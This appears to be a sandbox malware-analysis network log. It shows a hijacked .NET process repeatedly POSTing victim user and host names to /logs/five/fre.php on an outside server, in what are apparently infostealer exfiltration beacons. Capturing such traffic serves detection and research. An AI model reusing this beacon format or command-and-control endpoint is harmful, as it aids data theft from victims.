                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  38192.168.2.224921194.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:47.839322090 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:47.844722033 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:48.832372904 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:48 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  39192.168.2.224921294.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:48.989497900 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:48.994924068 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:49.962734938 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:49 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  40192.168.2.224921394.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:50.131140947 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:50.136564016 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:51.116910934 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:50 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  41192.168.2.224921494.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:51.717829943 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:51.723366976 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:52.700493097 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:52 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  42192.168.2.224921594.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:53.011574030 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:53.016943932 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:53.977907896 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:53 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  43192.168.2.224921694.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:54.382906914 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:54.388350010 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:55.352530003 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:55 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  44192.168.2.224921794.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:55.500909090 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:55.506350040 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:56.467716932 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:56 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  45192.168.2.224921894.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:56.877444983 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:56.882882118 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:57.837846041 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:57 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  46192.168.2.224921994.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:58.000648975 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:58.006443977 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:05:58.927994013 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:58 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  47192.168.2.224922094.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:05:59.123569012 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:05:59.129062891 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:00.104033947 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:05:59 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  48192.168.2.224922194.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:00.244307995 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:00.249789953 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:01.209410906 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:01 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  49192.168.2.224922294.156.177.220803824C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:01.354460001 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:01.359865904 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:02.330779076 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:02 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  50192.168.2.224922394.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:03.422554970 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:03.427994013 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:04.389720917 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:04 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  51192.168.2.224922494.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:05.789201975 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:05.794636011 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:06.748636961 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:06 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  52192.168.2.224922594.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:06.900989056 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:06.906331062 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:07.856770039 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:07 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  53192.168.2.224922694.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:08.002091885 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:08.007595062 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:08.974128962 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:08 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  54192.168.2.224922794.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:09.211359978 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:09.216752052 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:10.183198929 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:10 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
